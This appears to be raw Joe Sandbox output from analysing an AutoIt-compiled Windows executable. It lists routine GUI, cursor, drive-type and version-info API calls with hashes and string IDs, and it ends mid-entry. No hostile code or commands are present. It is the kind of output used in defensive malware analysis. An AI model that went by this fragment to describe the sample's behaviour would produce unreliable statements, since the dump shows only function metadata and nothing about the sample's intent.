                    • Instruction Fuzzy Hash: 51D1B830204305DBCB14EF60C855A6E77B5EF94344F14845AF98A5B3E2DB79EE0ACB92
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 007DA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 007DA8D0
                    • GetSysColor.USER32(0000000F), ref: 007DA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 007DA8F6
                    • SelectObject.GDI32(?,?), ref: 007DA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA930
                    • GetSysColor.USER32(00000010), ref: 007DA938
                    • CreateSolidBrush.GDI32(00000000), ref: 007DA93F
                    • FrameRect.USER32(?,?,00000000), ref: 007DA94E
                    • DeleteObject.GDI32(00000000), ref: 007DA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA9A0
                    • FillRect.USER32(?,?,?), ref: 007DA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DA9FD
                      • Part of subcall function 007DAB60: GetSysColor.USER32(00000012), ref: 007DAB99
                      • Part of subcall function 007DAB60: SetTextColor.GDI32(?,?), ref: 007DAB9D
                      • Part of subcall function 007DAB60: GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                      • Part of subcall function 007DAB60: GetSysColor.USER32(0000000F), ref: 007DABBE
                      • Part of subcall function 007DAB60: GetSysColor.USER32(00000011), ref: 007DABDB
                      • Part of subcall function 007DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                      • Part of subcall function 007DAB60: SelectObject.GDI32(?,00000000), ref: 007DABFA
                      • Part of subcall function 007DAB60: SetBkColor.GDI32(?,00000000), ref: 007DAC03
                      • Part of subcall function 007DAB60: SelectObject.GDI32(?,?), ref: 007DAC10
                      • Part of subcall function 007DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                      • Part of subcall function 007DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                      • Part of subcall function 007DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 21562c3fe354877030e6202bb99dbf4acde837fa68178d5a145f274d91af1e8c
                    • Instruction ID: 840342510be62a740a33ea2eb94c11e809ac3914ffaf7bdc633036a494e6f197
                    • Opcode Fuzzy Hash: 21562c3fe354877030e6202bb99dbf4acde837fa68178d5a145f274d91af1e8c
                    • Instruction Fuzzy Hash: 91A19D72009305FFD7119F64DC08A6B7BB9FF88321F148A2AF963962A0D739D944CB56
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 007C77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7946
                    • GetClientRect.USER32(00000000,?), ref: 007C7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C79A5
                    • GetStockObject.GDI32(00000011), ref: 007C79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 007C79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C79D2
                    • DeleteDC.GDI32(00000000), ref: 007C79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C7AAE
                    • GetStockObject.GDI32(00000011), ref: 007C7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                    • Instruction ID: e53165a38689146095d70d65ad3a15d6337dd2f3573e39b392610ccea0ab1c7e
                    • Opcode Fuzzy Hash: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                    • Instruction Fuzzy Hash: 1CA152B1A40219FFEB149B64DC4AFAA7BB9EF44710F048119FA15A72E0D7B4AD10CB64
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BAF89
                    • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BB066
                    • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                    • Instruction ID: f10a289127fd7185805b80f40e641ae034fe766e1d24b0a37beed13fd82ecb9e
                    • Opcode Fuzzy Hash: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                    • Instruction Fuzzy Hash: 6751803068430DEACB18EB28CD96AFD73B1FB543417208015EC6AE72D1D7AD9D46DB52
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 5ce0178840c71781703a6b8d860fe39574c66ae4f050643142fecd655463e5fe
                    • Instruction ID: 70b0ff21b95c7103c137bcda7120331197cac10e4a444329b391683776af94e5
                    • Opcode Fuzzy Hash: 5ce0178840c71781703a6b8d860fe39574c66ae4f050643142fecd655463e5fe
                    • Instruction Fuzzy Hash: A481F4B0640345EACF24BA30CC87FEE7768AF15741F548025FD45AB182EBACDA49D391
                    APIs
                    • GetSysColor.USER32(00000012), ref: 007DAB99
                    • SetTextColor.GDI32(?,?), ref: 007DAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                    • GetSysColor.USER32(0000000F), ref: 007DABBE
                    • CreateSolidBrush.GDI32(?), ref: 007DABC3
                    • GetSysColor.USER32(00000011), ref: 007DABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                    • SelectObject.GDI32(?,00000000), ref: 007DABFA
                    • SetBkColor.GDI32(?,00000000), ref: 007DAC03
                    • SelectObject.GDI32(?,?), ref: 007DAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 007DACEC
                    • DrawFocusRect.USER32(?,?), ref: 007DACF7
                    • GetSysColor.USER32(00000011), ref: 007DAD05
                    • SetTextColor.GDI32(?,00000000), ref: 007DAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAD21
                    • SelectObject.GDI32(?,007DA869), ref: 007DAD38
                    • DeleteObject.GDI32(?), ref: 007DAD43
                    • SelectObject.GDI32(?,?), ref: 007DAD49
                    • DeleteObject.GDI32(?), ref: 007DAD4E
                    • SetTextColor.GDI32(?,?), ref: 007DAD54
                    • SetBkColor.GDI32(?,?), ref: 007DAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 454221cdf4c4ebb4734ac9b57a67bb0e01845896ae7c59e534d62300fa864c72
                    • Instruction ID: c76b3800723c062a1a7b91d957ba0b25f4a7700233607ff85dcb693cbe3cc70b
                    • Opcode Fuzzy Hash: 454221cdf4c4ebb4734ac9b57a67bb0e01845896ae7c59e534d62300fa864c72
                    • Instruction Fuzzy Hash: 07614E71901218FFDF119FA4DC48EAE7BB9FB08320F148126F916AB2A1D7799D40DB90
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8D45
                    • CharNextW.USER32(0000014E), ref: 007D8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 007D8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8E8C
                    • _memset.LIBCMT ref: 007D8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8EFA
                    • _memset.LIBCMT ref: 007D8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 007D9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007D90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D9121
                    • DrawMenuBar.USER32(?), ref: 007D9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 007D9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: b6f497a4f54ba61830bbef708550ba7a2ee2560eeed39b41b787a04876d88823
                    • Instruction ID: 8168ca9c236495cfca747a6212305e0a195259ba76f96ffdc3c4702ac26313ab
                    • Opcode Fuzzy Hash: b6f497a4f54ba61830bbef708550ba7a2ee2560eeed39b41b787a04876d88823
                    • Instruction Fuzzy Hash: 04E17070901209EADF209F64CC88EEE7B79EF05710F108157F95AAA2D1DB789A81DF61
                    APIs
                    • GetCursorPos.USER32(?), ref: 007D4C51
                    • GetDesktopWindow.USER32 ref: 007D4C66
                    • GetWindowRect.USER32(00000000), ref: 007D4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 007D4CCF
                    • DestroyWindow.USER32(?), ref: 007D4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 007D4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4D90
                    • IsWindowVisible.USER32(?), ref: 007D4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4DDF
                    • GetWindowRect.USER32(?,?), ref: 007D4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 007D4E37
                    • CopyRect.USER32(?,?), ref: 007D4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 007D4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                    • Instruction ID: 89171bd8c8a8c00b88b6e75c959864e31138ea52205fd695d88c40f755599fdd
                    • Opcode Fuzzy Hash: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                    • Instruction Fuzzy Hash: 45B14971604341EFDB04DF64C949B5ABBF5BB84310F00891AF99A9B2A1DB79E804CBA5
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007B46E8
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007B470E
                    • _wcscpy.LIBCMT ref: 007B473C
                    • _wcscmp.LIBCMT ref: 007B4747
                    • _wcscat.LIBCMT ref: 007B475D
                    • _wcsstr.LIBCMT ref: 007B4768
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B4784
                    • _wcscat.LIBCMT ref: 007B47CD
                    • _wcscat.LIBCMT ref: 007B47D4
                    • _wcsncpy.LIBCMT ref: 007B47FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    • Opcode ID: b32ca4c43491afd1f0614b86d4867574aad867c18d925c2a2a39e681b9056bed
                    • Instruction ID: b4a14d3ff33ce323693ce723a69d849ec41256b790a1b611ed57bfc60057d7b0
                    • Opcode Fuzzy Hash: b32ca4c43491afd1f0614b86d4867574aad867c18d925c2a2a39e681b9056bed
                    • Instruction Fuzzy Hash: B541F975600310FADB14AB648C4AFFF777CEF42750F048066F909E6283EB7CA90196A5
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                    • GetSystemMetrics.USER32(00000007), ref: 007528C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                    • GetSystemMetrics.USER32(00000008), ref: 007528F7
                    • GetSystemMetrics.USER32(00000004), ref: 0075291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                    • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                    • GetStockObject.GDI32(00000011), ref: 007529CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                      • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                      • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 9054897501b9a0ebd8a20d8244da0c1758e8c7d5951a1fa6b178a84b913975ae
                    • Instruction ID: babdacc71580dd8d6cf0604ee7c8c21b0835c7ad1ed51b8af6d20ce3d68fb631
                    • Opcode Fuzzy Hash: 9054897501b9a0ebd8a20d8244da0c1758e8c7d5951a1fa6b178a84b913975ae
                    • Instruction Fuzzy Hash: 3FB16F71A4020ADFDB15DFA8DC45BED7BB4FB08311F108229FE16E6290DB78A856CB54
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007D40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                    • Instruction ID: 58e87bea7be3711170950dd493fb2e259e6f33d66fa0c9e6fdadce1d1b65488b
                    • Opcode Fuzzy Hash: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                    • Instruction Fuzzy Hash: CBA1B030214301DBCB14EF24C845A6AB3B5FF84314F148969B99AAB3D2DB79FC09CB51
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 007C5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007C5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 007C531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 007C532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007C5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 007C5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 007C534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 007C5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 007C5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 007C536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 007C5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 007C5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 007C538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 007C5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 007C53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 007C53AE
                    • GetCursorInfo.USER32(?), ref: 007C53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 007C53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                    • Instruction ID: 9deaa2ff084abe0c47814e5335f8f0ad7ffd8fca40318487451f43eb41be6795
                    • Opcode Fuzzy Hash: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                    • Instruction Fuzzy Hash: 43415170E04319AADB109FBA8C49D6FFFB8EF51B50B10452FE509E7290DAB8A541CE61
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AAAA5
                    • __swprintf.LIBCMT ref: 007AAB46
                    • _wcscmp.LIBCMT ref: 007AAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AABAE
                    • _wcscmp.LIBCMT ref: 007AABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 007AAC21
                    • GetDlgCtrlID.USER32(?), ref: 007AAC73
                    • GetWindowRect.USER32(?,?), ref: 007AACA9
                    • GetParent.USER32(?), ref: 007AACC7
                    • ScreenToClient.USER32(00000000), ref: 007AACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AAD48
                    • _wcscmp.LIBCMT ref: 007AAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 007AAD82
                    • _wcscmp.LIBCMT ref: 007AAD96
                      • Part of subcall function 0077386C: _iswctype.LIBCMT ref: 00773874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
